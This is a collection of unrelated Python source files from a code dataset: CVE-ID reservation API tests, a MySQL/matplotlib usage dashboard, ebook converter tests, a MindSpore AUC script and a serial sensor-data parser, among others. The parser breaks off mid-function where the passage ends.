        text_message = "Finished uploading file \n"
        if pft != "barcodecount":
            text_message += "{} saved as {} on {}\n".format(result['Name'],
                            result['Type'], result['Date'])
        else:
            for pc_result in result:
                text_message += "{} saved as {} on {}\n".format(pc_result['Name'],
                                pc_result['Type'], pc_result['Date'])
        logging.info(text_message)
        # Returning file in zipped format:-------------------------------
        report_created = False
        if len(os.listdir(res_dir)) > 0:
            report_created = True
            logging.info("res dir: " + ", ".join(os.listdir(res_dir)))
            dfu = DataFileUtil(self.callback_url)
            file_zip_shock_id = dfu.file_to_shock({'file_path': res_dir,
                                                  'pack': 'zip'})['shock_id']
            dir_link = {
                    'shock_id': file_zip_shock_id,
                    'name': 'results.zip',
                    'label':'RBTS_UPLOAD_output_dir',
                    'description': 'The directory of outputs from uploading' \
                            + 'RBTS table.'
                    }
            report_params = {
                    'workspace_name' : params['workspace_name'],
                    'file_links':[dir_link],
                    "message": text_message
                    }
            #Returning file in zipped format:------------------------------------------------------------------
            report_util = KBaseReport(self.callback_url)
            report_info = report_util.create_extended_report(report_params)
        # ----------
        # Fall back to a plain text report when there were no output files.
        if not report_created:
            report = KBaseReport(self.callback_url)
            report_info = report.create({'report': {'objects_created':[],
                                                    'text_message': text_message},
                                                    'workspace_name': params['workspace_name']})
        output = {
            'report_name': report_info['name'],
            'report_ref': report_info['ref'],
        }
        #END run_poolfileupload

        # At some point might do deeper type checking...
        if not isinstance(output, dict):
            raise ValueError('Method run_poolfileupload return value ' +
                             'output is not type dict as required.')
        # return the results
        return [output]

    def status(self, ctx):
        #BEGIN_STATUS
        # Standard KBase SDK status payload.
        returnVal = {'state': "OK",
                     'message': "",
                     'version': self.VERSION,
                     'git_url': self.GIT_URL,
                     'git_commit_hash': self.GIT_COMMIT_HASH}
        #END_STATUS
        return [returnVal]
| StarcoderdataPython |
6433757 | <filename>automix/model/inputOutput/serializer/xmlSerializer.py
class XmlSerialiser(object):
    """Deserializer for SegmXML audio-segmentation annotation files."""

    @staticmethod
    def xmlDeserialize(path):
        """
        get a track from the SegmXML format: http://www.ifs.tuwien.ac.at/mir/audiosegmentation.html

        :param path: path to a SegmXML file
        :return: a Track with its name and labeled Segments populated
        """
        # NOTE(review): ET, Track and Segment are not imported in this view;
        # presumably xml.etree.ElementTree and the project's model classes.
        tree = ET.parse(path)
        root = tree.getroot()
        track = Track()
        # The track title lives under metadata/song/title in SegmXML.
        track.name = root.find('metadata').find('song').find('title').text
        # Each <segment> carries a label plus start/end times in seconds.
        # NOTE(review): attrib values are strings -- confirm Segment coerces
        # start/end to numbers.
        track.segments = [
            Segment(segment.attrib['label'], start=segment.attrib['start_sec'], end=segment.attrib['end_sec'])
            for segment in root.find('segmentation').iter('segment')
        ]
        return track
| StarcoderdataPython |
12808588 | import copy
import datetime as dt
import json
import pytest
import requests
import time
import uuid
from src import env, utils
from src.utils import (assert_contains, ok_response_contains,
response_contains, response_contains_json)
# Endpoint under test, plus a CVE ID guaranteed to exist upstream
# (the first ID ever assigned, from 1999).
CVE_ID_URL = '/api/cve-id'
cve_id = 'CVE-1999-0001'
#### GET /cve-id:id ####
def test_get_cve_id(org_admin_headers):
    """ the first ID from 1999 should always exist """
    res = requests.get(
        f'{env.AWG_BASE_URL}{CVE_ID_URL}/{cve_id}',
        headers=org_admin_headers
    )
    ok_response_contains(res, cve_id)
def test_get_cve_id_bad_org_header(org_admin_headers):
    """ unauthorized users can't get known IDs """
    # A random UUID cannot match any registered org/user credentials.
    uid = str(uuid.uuid4())
    tmp = copy.deepcopy(org_admin_headers)
    tmp['CVE-API-ORG'] = uid
    tmp['CVE-API-USER'] = uid
    res = requests.get(
        f'{env.AWG_BASE_URL}{CVE_ID_URL}/{cve_id}',
        headers=tmp
    )
    assert res.status_code == 401
    assert res.reason == 'Unauthorized'
    response_contains_json(res, 'error', 'UNAUTHORIZED')
def test_get_cve_id_id(org_admin_headers):
    """ fetching a known id returns it in the response body """
    res = requests.get(
        f'{env.AWG_BASE_URL}{CVE_ID_URL}/{cve_id}',
        headers=org_admin_headers
    )
    # The original test ignored the response and only type-checked the
    # module-level constant (which could never fail); assert on the
    # service's answer instead.
    assert res.status_code == 200
    response_contains(res, cve_id)
    assert isinstance(cve_id, str)
#### PUT /cve-id:id ####
def test_put_cve_id_id_state(org_admin_headers):
    """ org admin cannot update id's state """
    res = requests.put(
        f'{env.AWG_BASE_URL}{CVE_ID_URL}/{cve_id}',
        headers=org_admin_headers,
        params={'state':'PUBLIC'}
    )
    # State transitions are restricted to the secretariat role.
    assert res.status_code == 403
    response_contains_json(res, 'error', 'SECRETARIAT_ONLY')
#### POST /cve-id ####
def test_post_cve_id_update_parameters(org_admin_headers):
    """ org admins can update own information """
    res = requests.post(
        f'{env.AWG_BASE_URL}{CVE_ID_URL}',
        headers=org_admin_headers,
        params={
            'amount': '10',
            'batch_type': 'sequential',
            'cve_year': f'{utils.CURRENT_YEAR}',
            'short_name': org_admin_headers['CVE-API-ORG']
        }
    )
    assert res.status_code == 200
def test_post_cve_id_no_params(org_admin_headers):
    """ batch type is the only optional parameter for reserving ids """
    res = requests.post(
        f'{env.AWG_BASE_URL}{CVE_ID_URL}',
        headers=org_admin_headers
    )
    # Each missing required parameter is named in the error body.
    assert res.status_code == 400
    response_contains(res, 'amount')
    response_contains(res, 'cve_year')
    response_contains(res, 'short_name')
def test_post_cve_id_empty_params(org_admin_headers):
    """ cve services doesn't accept id reservation with blank parameters """
    res = requests.post(
        f'{env.AWG_BASE_URL}{CVE_ID_URL}',
        headers=org_admin_headers,
        params={
            'amount': '',
            'batch_type': '',
            'cve_year': '',
            'short_name': ''
        }
    )
    # NOTE: there isn't a `short_name` error here, why?
    assert res.status_code == 400
    response_contains(res, 'amount')
    response_contains(res, 'cve_year')
def test_post_cve_id_wrong_header(org_admin_headers):
    """ org_admin_headers cannot post for 'mitre' org """
    res = requests.post(
        f'{env.AWG_BASE_URL}{CVE_ID_URL}',
        headers=org_admin_headers,
        params={
            'amount': '10',
            'batch_type': 'sequential',
            'cve_year': f'{utils.CURRENT_YEAR}',
            'short_name': 'mitre'
        }
    )
    # NOTE: this error also occurs when short_name is empty, expected error is 'NO_ORG_SHORTNAME'
    # and when short_name is invalid, expected error is 'ORG_DNE'
    assert res.status_code == 403
    response_contains_json(res, 'error', 'ORG_CANNOT_RESERVE_FOR_OTHER')
def test_post_cve_id_empty_year(org_admin_headers):
    """ cve services rejects empty year """
    res = requests.post(
        f'{env.AWG_BASE_URL}{CVE_ID_URL}',
        headers=org_admin_headers,
        params={
            'amount': '10',
            'batch_type': 'sequential',
            'cve_year': '',
            'short_name': 'mitre'
        }
    )
    assert res.status_code == 400
    response_contains_json(res, 'error', 'BAD_INPUT')
def test_post_cve_id_bad_year(org_admin_headers):
    """ cve services rejects year that isn't a 4 digit number"""
    res = requests.post(
        f'{env.AWG_BASE_URL}{CVE_ID_URL}',
        headers=org_admin_headers,
        params={
            'amount': '10',
            'batch_type': 'sequential',
            'cve_year': '20111',
            'short_name': 'mitre'
        }
    )
    assert res.status_code == 400
    response_contains_json(res, 'error', 'BAD_INPUT')
def test_post_cve_id_empty_amount(org_admin_headers):
    """ cve services rejects empty amount """
    res = requests.post(
        f'{env.AWG_BASE_URL}{CVE_ID_URL}',
        headers=org_admin_headers,
        params={
            'amount': '',
            'batch_type': 'sequential',
            'cve_year': f'{utils.CURRENT_YEAR}',
            'short_name': 'mitre'
        }
    )
    assert res.status_code == 400
    response_contains_json(res, 'error', 'BAD_INPUT')
def test_post_cve_id_invalid_amount(org_admin_headers):
    """ cve services rejects amount less than or equal to 0 """
    res = requests.post(
        f'{env.AWG_BASE_URL}{CVE_ID_URL}',
        headers=org_admin_headers,
        params={
            'amount': '-1',
            'batch_type': 'sequential',
            'cve_year': f'{utils.CURRENT_YEAR}',
            'short_name': org_admin_headers['CVE-API-ORG']
        }
    )
    assert res.status_code == 400
    response_contains_json(res, 'error', 'INVALID_AMOUNT')
def test_post_cve_id_no_batch_type(org_admin_headers):
    """ cve services rejects not having a batch type"""
    res = requests.post(
        f'{env.AWG_BASE_URL}{CVE_ID_URL}',
        headers=org_admin_headers,
        params={
            'amount': '10',
            'batch_type': '',
            'cve_year': f'{utils.CURRENT_YEAR}',
            'short_name': org_admin_headers['CVE-API-ORG']
        }
    )
    assert res.status_code == 400
    response_contains_json(res, 'error', 'NO_BATCH_TYPE')
def test_post_cve_id_invalid_batch_type(org_admin_headers):
    """ cve services rejects batch types that aren't 'sequential' or 'nonsequential' """
    res = requests.post(
        f'{env.AWG_BASE_URL}{CVE_ID_URL}',
        headers=org_admin_headers,
        params={
            'amount': '10',
            'batch_type': '---',
            'cve_year': f'{utils.CURRENT_YEAR}',
            'short_name': org_admin_headers['CVE-API-ORG']
        }
    )
    assert res.status_code == 400
    response_contains_json(res, 'error', 'INVALID_BATCH_TYPE')
def test_post_cve_id_bad_amount(org_admin_headers):
    """ api rejects non-numeric amount when requesting IDs """
    res = get_reserve_cve_ids('a', utils.CURRENT_YEAR, org_admin_headers['CVE-API-ORG'])
    assert res.status_code == 400
    assert res.reason == 'Bad Request'
    response_contains_json(res, 'error', 'BAD_INPUT')
    assert_contains(res, 'amount')
def test_post_cve_id_reserve_priority(org_admin_headers):
    """ priority ids can be reserved on behalf of the admin's org """
    res = requests.post(
        f'{env.AWG_BASE_URL}{CVE_ID_URL}',
        headers=org_admin_headers,
        params={
            'amount': '1',
            'cve_year': f'{utils.CURRENT_YEAR}',
            'short_name': org_admin_headers['CVE-API-ORG']
        }
    )
    ok_response_contains(res, f'CVE-{utils.CURRENT_YEAR}-')
    assert json.loads(res.content.decode())['cve_ids']
    assert len(json.loads(res.content.decode())['cve_ids']) == 1
    # Priority IDs come from the low (< 20000) sequence block.
    priority_id = json.loads(res.content.decode())['cve_ids'][0]['cve_id']
    assert int(priority_id.split('-')[-1]) < 20000
# Does this constitute a performance test? The distinction I'm making is that
# performance tests stress the system overall, while these tests try to
# test both "reservation works" and "there's some reasonable amount that we
# can request that doesn't stress the system"
@pytest.mark.parametrize(
    "batch_type, amount",
    [('sequential', 10), ('sequential', 1000),
    ('nonsequential', 1), ('nonsequential', 10)])
def test_post_cve_id_reservation(batch_type, amount, org_admin_headers):
    """ sequential ids can be reserved on behalf of the mitre org """
    res = get_reserve_cve_ids(amount, utils.CURRENT_YEAR, org_admin_headers['CVE-API-ORG'], batch_type)
    ok_response_contains(res, f'CVE-{utils.CURRENT_YEAR}-')
    assert json.loads(res.content.decode())['cve_ids']
    assert len(json.loads(res.content.decode())['cve_ids']) == amount
    # cna and user must exist
    assert 'cna' in res.content.decode()
    assert 'user' in res.content.decode()
def test_post_cve_id_reserve_sequential_over_quota(org_admin_headers):
    """ the services api enforces a max quota of 100,000 """
    res = get_reserve_cve_ids(100001, utils.CURRENT_YEAR, org_admin_headers['CVE-API-ORG'])
    assert res.status_code == 403
    response_contains_json(res, 'error', 'EXCEEDED_ID_QUOTA')
def test_post_cve_id_reserve_nonsequential_over_limit(org_admin_headers):
    """ the services api enforces a max non-sequential limit of 10 """
    res = get_reserve_cve_ids(11, utils.CURRENT_YEAR, org_admin_headers['CVE-API-ORG'], 'nonsequential')
    assert res.status_code == 403
    response_contains_json(res, 'error', 'OVER_NONSEQUENTIAL_MAX_AMOUNT')
#### GET /cve-id ####
def test_get_cve_id_by_time_reserved(org_admin_headers):
    """ we can get ids immediately after reserving them using the time they're
    reserved (noting that this may not work against a shared integration
    environment, we check that at least this many have been reserved) """
    n_ids = 10
    # 1-second sleeps keep the before/after timestamps strictly outside the
    # reservation window (the API filter has second resolution).
    time.sleep(1)
    t_before = dt.datetime.now().strftime('%Y-%m-%dT%H:%M:%S')
    time.sleep(1)
    res_ids = get_reserve_cve_ids(n_ids, utils.CURRENT_YEAR, org_admin_headers['CVE-API-ORG'])  # response unused; the reservation is the point
    time.sleep(1)
    t_after = dt.datetime.now().strftime('%Y-%m-%dT%H:%M:%S')
    res_get_ids = requests.get(
        f'{env.AWG_BASE_URL}{CVE_ID_URL}',
        headers=utils.BASE_HEADERS,
        params={
            'time_reserved.lt': t_after,
            'time_reserved.gt': t_before
        }
    )
    ok_response_contains(res_get_ids, f'CVE-{utils.CURRENT_YEAR}-')
    assert len(json.loads(res_get_ids.content.decode())['cve_ids']) == n_ids
def test_get_cve_id_by_time_modified(org_admin_headers):
    """ we can get ids immediately after reserving them using the time they're
    modified (reservation also sets the modification time; this may not work
    against a shared integration environment) """
    n_ids = 10
    time.sleep(1)
    t_before = dt.datetime.now().strftime('%Y-%m-%dT%H:%M:%S')
    time.sleep(1)
    res_ids = get_reserve_cve_ids(n_ids, utils.CURRENT_YEAR, org_admin_headers['CVE-API-ORG'])  # response unused; the reservation is the point
    time.sleep(1)
    t_after = dt.datetime.now().strftime('%Y-%m-%dT%H:%M:%S')
    res_get_ids = requests.get(
        f'{env.AWG_BASE_URL}{CVE_ID_URL}',
        headers=utils.BASE_HEADERS,
        params={
            'time_modified.lt': t_after,
            'time_modified.gt': t_before
        }
    )
    ok_response_contains(res_get_ids, f'CVE-{utils.CURRENT_YEAR}-')
    assert len(json.loads(res_get_ids.content.decode())['cve_ids']) == n_ids
def test_get_cve_id_with_params(org_admin_headers):
""" org admin can retrieve ids"""
res = requests.get(
f'{env.AWG_BASE_URL}{CVE_ID_URL}',
headers=org_admin_headers,
params={
'page': 1,
'state': 'PUBLIC',
'cve_id_year': 2011
}
)
assert res.status_code == 200
def test_get_cve_id_empty_parameters(org_admin_headers):
""" cannot get id with empty parameters """
res = requests.get(
f'{env.AWG_BASE_URL}{CVE_ID_URL}',
headers=org_admin_headers,
params={
'page': ' ',
'state': ' ',
'cve_id_year': ' ',
'time_reserved.lt': ' ',
'time_reserved.gt': ' ',
'time_modified.lt': ' ',
'time_modified.gt': ' '
}
)
assert res.status_code == 400
response_contains(res, 'page')
response_contains(res, 'state')
response_contains(res, 'cve_id_year')
response_contains(res, 'time_reserved.lt')
response_contains(res, 'time_reserved.gt')
response_contains(res, 'time_modified.lt')
response_contains(res, 'time_modified.gt')
response_contains_json(res, 'error', 'BAD_INPUT')
def test_get_cve_id_page_format_number(org_admin_headers):
    """ page must be an integer """
    url = f'{env.AWG_BASE_URL}{CVE_ID_URL}'
    res = requests.get(url, headers=org_admin_headers, params={'page': 'test'})
    assert res.status_code == 400
    response_contains_json(res, 'error', 'BAD_INPUT')
def test_get_cve_id_page_limit(org_admin_headers):
    """ page must be greater than or equal to 1 """
    url = f'{env.AWG_BASE_URL}{CVE_ID_URL}'
    res = requests.get(url, headers=org_admin_headers, params={'page': '-1'})
    assert res.status_code == 400
    response_contains_json(res, 'error', 'BAD_INPUT')
def test_get_cve_id_state_in_choices(org_admin_headers):
    """ state parameter can only be 'REJECT', 'PUBLIC' or 'RESERVED' """
    url = f'{env.AWG_BASE_URL}{CVE_ID_URL}'
    res = requests.get(url, headers=org_admin_headers, params={'state': 'TEST'})
    assert res.status_code == 400
    response_contains_json(res, 'error', 'BAD_INPUT')
def test_get_cve_id_year_format_with_letters(org_admin_headers):
    """ cve_id_year format cannot have letters """
    url = f'{env.AWG_BASE_URL}{CVE_ID_URL}'
    res = requests.get(url, headers=org_admin_headers, params={'cve_id_year': 'test'})
    assert res.status_code == 400
    response_contains_json(res, 'error', 'BAD_INPUT')
def test_get_cve_id_year_format_with_digits(org_admin_headers):
    """ cve_id_year format must be 4 digits only """
    url = f'{env.AWG_BASE_URL}{CVE_ID_URL}'
    # five digits -> rejected
    res = requests.get(url, headers=org_admin_headers, params={'cve_id_year': '20111'})
    assert res.status_code == 400
    response_contains_json(res, 'error', 'BAD_INPUT')
def test_get_cve_id_available_state(org_admin_headers):
    """ CVE ID filter endpoint does not return any IDs with state 'AVAILABLE' """
    query = {
        'page': 1,
        'state': 'PUBLIC',
        'cve_id_year': 2011,
    }
    res = requests.get(
        f'{env.AWG_BASE_URL}{CVE_ID_URL}',
        headers=org_admin_headers,
        params=query,
    )
    assert res.status_code == 200
    body = res.content.decode()
    assert 'AVAILABLE' not in body
# CVE-ID ENDPOINT UTILITIES
# ==============================================================================
# these are unique to the `{CVE_ID_URL}` endpoint for the AWG system
def get_reserve_cve_ids(
        amount, year, cna_short_name, batch_type='sequential'):
    """POST a reservation request for `amount` CVE ids in `year` on behalf of
    the CNA identified by `cna_short_name`; returns the raw response."""
    payload = {
        'amount': str(amount),
        'batch_type': batch_type,
        'cve_year': str(year),
        'short_name': cna_short_name,
    }
    return requests.post(
        f'{env.AWG_BASE_URL}{CVE_ID_URL}',
        headers=utils.BASE_HEADERS,
        params=payload,
    )
315270 | from math import ceil
# Read the series name, the episode length and the lunch break length.
series_name: str = input()
episode_runtime: int = int(input())
lunch_break_duration: int = int(input())

# Time left after the episode plus 1/8 and 1/4 of the break are subtracted
# from the break itself (negative means the episode does not fit).
remaining: float = lunch_break_duration - episode_runtime
remaining -= lunch_break_duration / 8
remaining -= lunch_break_duration / 4

if remaining >= 0:
    print(f'You have enough time to watch {series_name} and left with {ceil(remaining)} minutes free time.')
else:
    print(f'You don\'t have enough time to watch {series_name}, you need {ceil(abs(remaining))} more minutes.')
| StarcoderdataPython |
5114917 | # import modules
from .sql_kit import SQL_Kit
# libraries
import mysql.connector
from datetime import datetime
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import getpass
# this pulls data from the SQL database, then displays a dashboard of interactive plots, widgets and animations!
class Dashboard:
    """Pulls transposition data from the MySQL database and renders a set of
    summary plots: daily transpositions by hour, a running average, totals per
    day, top instruments, top start notes and a start-position breakdown.

    Parameters
    ----------
    userID, password : optional MySQL credentials; when both are omitted the
        user is prompted interactively.
    database : schema name, defaults to 'easytranspose'.
    """

    def __init__(self, userID=None, password=None, database='easytranspose'):
        # if no credentials are passed, prompt user
        if userID is None and password is None:
            # MySQL info -- getpass keeps the password off the terminal.
            # (Fixed: the previous placeholder `<PASSWORD>(...)` was not valid
            # Python.)
            self.userID = input('User ID: ')
            self.password = getpass.getpass('Password: ')
            self.database = database
        # credentials passed
        else:
            # MySQL info
            self.userID = userID
            self.password = password
            self.database = database

    def select_table(self, table):
        """SELECT * FROM `table` via SQL_Kit and return the result."""
        s = SQL_Kit(self.userID, self.password, self.database)
        data = s.select_table(table)
        return data

    def display(self):
        """Fetch the 'transpose' table once and draw every dashboard plot."""
        # import data from MySQL table (single query, reused by all plots)
        df = self.select_table('transpose')

        # set matplotlib style
        plt.style.use('dark_background')

        # --- Daily Transpositions by Hour ---------------------------------
        all_date_times = df['EventDateTime']
        all_days = []
        all_hours = []
        for item in all_date_times:
            all_days.append(item.timetuple().tm_yday)  # day-of-year (1..366)
            all_hours.append(item.hour)
        x = all_days
        y = all_hours
        x_labels = pd.Series(all_days).unique()
        fig1, ax1 = plt.subplots()
        ax1.set_title('Daily Transpositions by Hour')
        ax1.scatter(x, y, color='mediumspringgreen', linewidths=1)
        ax1.set_xlabel('day of year')
        ax1.set_ylabel('hour')
        ax1.xaxis.grid(True)
        # with many distinct days only label the ends to avoid tick clutter
        if len(x_labels) > 5:
            ax1.xaxis.set_ticks([min(all_days), max(all_days)])
        else:
            ax1.xaxis.set_ticks(x_labels)
        ax1.yaxis.grid(False)
        plt.show()

        # --- Moving average of transpositions per day ---------------------
        def day_of_year(datetime_entry):
            # helper: calendar day index for one timestamp
            return datetime_entry.timetuple().tm_yday

        df['day_of_year'] = list(df.apply(lambda x: day_of_year(x['EventDateTime']), axis=1))
        daily_count = df['day_of_year'].value_counts().sort_index()
        # cumulative mean of the daily counts, rounded to 2 decimals
        averages = []
        for i in range(1, len(daily_count) + 1):
            values = daily_count[:i]
            averages.append(round(sum(values) / len(values), 2))
        day_list = list(df['day_of_year'].unique())
        avg_move_df = pd.DataFrame([day_list, averages]).T
        avg_move_df.rename(columns={0: 'day_id', 1: 'moving_avg'}, inplace=True)
        avg_move_df.set_index('day_id', inplace=True)
        fig1, ax1 = plt.subplots()
        ax1.plot(avg_move_df.index.astype(int), avg_move_df['moving_avg'], color='mediumspringgreen')
        ax1.set_title('Moving AVG')
        ax1.set_xlabel('day_of_year')
        ax1.xaxis.set_ticks([min(all_days), max(all_days)])
        ax1.set_ylabel('avg transpositions per day')
        plt.show()

        # --- Total Transpositions per day ---------------------------------
        dates = []
        for item in list(df['EventDateTime']):
            # build a m/d/yyyy label for each event
            dates.append(str(item.month) + '/' + str(item.day) + '/' + str(item.year))
        data = pd.DataFrame(pd.Series(dates).value_counts()).sort_index()
        objects = list(data.index)
        performance = list(data[0])
        y_pos = np.arange(len(objects))
        plt.bar(y_pos, performance, color='mediumspringgreen', align='center', alpha=0.8)
        plt.xticks(y_pos, objects)
        plt.title('Total Transpositions per Day')
        plt.ylabel('Total Transpositions ')
        plt.xlabel('Day')
        plt.show()

        # --- Top 3 Instruments --------------------------------------------
        objects = df['Instrument'].value_counts().index[:3]
        y_pos = np.arange(len(objects))
        performance = list(df['Instrument'].value_counts())[:3]
        plt.bar(y_pos, performance, color='mediumspringgreen', align='center', alpha=0.8)
        plt.xticks(y_pos, objects)
        plt.title('Top 3 Instruments')
        plt.ylabel('Total Usage')
        plt.xlabel('Instrument')
        plt.show()

        # --- Top 5 Start Notes --------------------------------------------
        objects = df['StartNote'].value_counts().index[:5]
        y_pos = np.arange(len(objects))
        performance = list(df['StartNote'].value_counts())[:5]
        plt.bar(y_pos, performance, color='mediumspringgreen', align='center', alpha=0.8)
        plt.xticks(y_pos, objects)
        plt.title('Top 5 Start Notes')
        plt.ylabel('Total Usage')
        plt.xlabel('Note Label')
        plt.show()

        # --- Start Position Breakdown -------------------------------------
        # reuse the DataFrame fetched above instead of issuing a second,
        # redundant SELECT against the database
        objects = df['StartPosition'].value_counts().index[:5]
        y_pos = np.arange(len(objects))
        performance = list(df['StartPosition'].value_counts())[:5]
        plt.bar(y_pos, performance, color='mediumspringgreen', align='center', alpha=0.8)
        plt.xticks(y_pos, objects)
        plt.title('Start Position')
        plt.ylabel('Total Usage')
        plt.xlabel('Start Position')
        plt.show()
4984338 | from txt2epub_pdf import txt2epub
from txt2epub_pdf import txt2pdf
class Testtxt2epub():
    """Tests for the txt2epub converter."""

    def test__make_1(self):
        # Complete metadata, including the source directory: conversion succeeds.
        metadata = {
            "path": "./tests/TEST BOOK",
            "title": "テストブック",
            "title_ruby": "てすとぶっく",
            "sub_title": "txt2epub_pdfを使って",
            "author": "Dr?Thomas",
            "author_ruby": "どくたーとーます",
            "publisher": "山原出版",
            "publisher_ruby": "やまはらしゅっぱん",
            "illustrator": "山原喜寛",
            "version": 14,
            "original_first_day": "1979-04-11",
            "original_url": "https://www.hobofoto.work/",
            "fiction": True,
        }
        converter = txt2epub(metadata)
        assert converter.make() == '電子書籍(epub)の作成が完了しました。'

    def test__make_2(self):
        # Same metadata but without 'path': make() reports the missing directory.
        metadata = {
            "title": "テストブック",
            "title_ruby": "てすとぶっく",
            "sub_title": "txt2epub_pdfを使って",
            "author": "Dr?Thomas",
            "author_ruby": "どくたーとーます",
            "publisher": "山原出版",
            "publisher_ruby": "やまはらしゅっぱん",
            "illustrator": "山原喜寛",
            "version": 14,
            "original_first_day": "1979-04-11",
            "original_url": "https://www.hobofoto.work/",
            "fiction": True,
        }
        converter = txt2epub(metadata)
        assert converter.make() == '読み込みディレクトリを設定して下さい。'
class Testtxt2pdf():
    """Tests for the txt2pdf converter."""

    def test__make(self):
        # Complete metadata: PDF conversion succeeds.
        metadata = {
            "path": "./tests/TEST BOOK",
            "title": "テストブック",
            "title_ruby": "てすとぶっく",
            "sub_title": "txt2epub_pdfを使って",
            "author": "Dr?Thomas",
            "author_ruby": "どくたーとーます",
            "publisher": "山原出版",
            "publisher_ruby": "やまはらしゅっぱん",
            "illustrator": "山原喜寛",
            "version": 14,
            "original_first_day": "1979-04-11",
            "original_url": "https://www.hobofoto.work/",
            "fiction": True,
        }
        converter = txt2pdf(metadata)
        assert converter.make() == 'Portable Document Format(pdf)の作成が完了しました。'
| StarcoderdataPython |
29700 | <reponame>leelige/mindspore
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""postprocess."""
import argparse
import os
import numpy as np
from mindspore import Tensor
from src.config import ModelConfig
from src.metrics import AUCMetric
# Command-line arguments for the post-processing step.
# NOTE(review): the help texts ('Dataset path' / 'Checkpoint path') look
# swapped relative to the defaults -- confirm against the original repo.
parser = argparse.ArgumentParser(description='CTR Prediction')
parser.add_argument('--result_path', type=str, default="./result_Files", help='Dataset path')
parser.add_argument('--label_path', type=str, default="./CriteoBinary/batch_labels", help='Checkpoint path')
args = parser.parse_args()
def get_acc():
    ''' get accuracy '''
    # Batch size comes from the model configuration; every .bin file holds
    # one batch of float32 values.
    cfg = ModelConfig()
    bs = cfg.batch_size
    metric = AUCMetric()
    for fname in os.listdir(args.label_path):
        pred_path = os.path.join(args.result_path, fname.split('.')[0] + '_0.bin')
        truth_path = os.path.join(args.label_path, fname)
        pred = Tensor(np.fromfile(pred_path, np.float32).reshape(bs, 1))
        truth = Tensor(np.fromfile(truth_path, np.float32).reshape(bs, 1))
        # The prediction tensor is passed twice (first and second slot), as in
        # the original call -- presumably standing in for the loss component.
        metric.update(pred, pred, truth)
    auc = metric.eval()
    print("auc : {}".format(auc))
# Script entry point: compute and print the AUC over the exported batches.
if __name__ == '__main__':
    get_acc()
| StarcoderdataPython |
323423 | # Routine to parse the data line received from the sensors
# 20160705
# Changed the format of the data from the sensor.
# New dust sensor with more data and re-ordered the data channels
from random import randint
import serial # Serial communications
import os #OS calls to control the screensaver and play sounds
import time
class Pacman(object):
    """ The real pacman. Open serial port on initialisation. Further calls read a new line of data.

    Reads ./config.txt on construction: line 1 selects 'live' (serial port)
    or test mode (replay from pacman_sample.txt); line 2 holds the serial
    settings, e.g. "/dev/ttyAMA0,9600,N,8,n". Parsed records are appended to
    a daily file under self.datapath.
    """
    # Init
    def __init__(self):
        # Read the settings from the settings file
        settings_file = open("./config.txt")
        # Define test or live mode
        self.mode_line = settings_file.readline().rstrip('\n')
        # e.g. "/dev/ttyAMA0,9600,N,8,n"
        settings_line = settings_file.readline().rstrip('\n').split(',')
        port = settings_line[0]
        # NOTE(review): eval() executes arbitrary code from config.txt;
        # int() would be safer for the numeric fields.
        baud = eval(settings_line[1])
        par = settings_line[2]
        byte = eval(settings_line[3])
        # NOTE(review): `port` and `ceol` are parsed but never used below
        # (the port string is re-read from settings_line[0] directly).
        ceol = settings_line[4]
        # Close the settings file
        settings_file.close()
        # Set the initial time for data storage
        self.datapath = "../data/"
        self.rec_time=time.gmtime()
        if (self.mode_line == 'live'):
            # If live ... open the serial port
            # Open the serial port and clean the I/O buffer
            self.ser = serial.Serial()
            self.ser.port = settings_line[0]
            self.ser.baudrate = baud
            self.ser.parity = par
            self.ser.bytesize = byte
            self.ser.open()
            self.ser.flushInput()
            self.ser.flushOutput()
        else:
            # If test ... open and read sample file
            file = open("pacman_sample.txt", "r")
            self.lines = file.read().split('\n')
            file.close()
        # Initialise the activity counter
        self.movlist = [0] * 60
        # Initialise the frames for scaling Output (one slot per sample,
        # 60-sample rolling windows)
        self.framePM1 = [0] * 60
        self.framePM10 = [0] * 60
        self.frameCO2 = [0] * 60
        self.frameDUST = [0] * 60
        self.frameTEMP = [10] * 60
        # Initialise max/min for scaling Output (seed one extreme value so
        # the initial scale range is non-degenerate)
        self.frameCO2 = [-2500] + self.frameCO2[:-1]
        self.frameDUST = [300] + self.frameDUST[:-1]
        self.frameTEMP = [30] + self.frameTEMP[:-1]
        # Initialise the max/min for scales
        self.maxCO2 = max(self.frameCO2)
        self.minCO2 = min(self.frameCO2)
        self.maxDUST = max(self.frameDUST)
        self.minDUST = min(self.frameDUST)
        self.maxTEMP = max(self.frameTEMP)
        self.minTEMP = min(self.frameTEMP)

    def read_data(self):
        """ Reads data from pacman: one serial line in live mode, or a random
        line from the sample file in test mode; returns the parsed tuple. """
        if (self.mode_line == 'live'):
            # Get a line of data from PACMAN
            line = self.ser.readline()
        else:
            # test mode: pick a random sample line
            end = len(self.lines) - 1
            start = 0
            idx = randint(start, end)
            line = self.lines[idx]
        self.entry = self.parse_line(line)
        #print(self.entry)
        return self.entry

    def parse_line(self, line):
        """Parse one raw sensor line, update the rolling min/max frames,
        append valid records to the daily data file, and return the tuple
        (pm1, dust, pm10, distance, t1, rh, co2, minCO2, maxCO2, minDUST,
        maxDUST, minTEMP, maxTEMP). Invalid lines yield -99 sentinels."""
        #Get the measurements
        #Data line is:
        #PM1
        #PM2.5
        #PM10
        #TSIPM1
        #TSIPM2.5
        #TSIPM10
        #Data7
        #Data8
        #Data9
        #Distance
        #Temperature
        #RH
        #CO2
        err_value = -99
        if len(line) >0:
            if (line[0].isdigit()):
                p_vec = list(map(float,line.split()))
                if (len(p_vec)>=13):
                    # valid record: pick the channels of interest
                    pm1 = p_vec[0] #0
                    dust =p_vec[1] #1
                    pm10 = p_vec[2] #2
                    distance = p_vec[9] #3
                    t1 = p_vec[10] #4
                    rh = p_vec[11] #5
                    co2 = -1*p_vec[12] #6
                else:
                    # fewer than the 13 expected channels -> error sentinels
                    print("Short data line")
                    print(p_vec)
                    pm1 = err_value #0
                    dust = err_value #1
                    pm10 = err_value #2
                    distance = err_value #3
                    t1 = err_value #4
                    rh = err_value #5
                    co2 = err_value #6
            else:
                # line does not start with a digit -> error sentinels
                print("Non numeric first character")
                print(line)
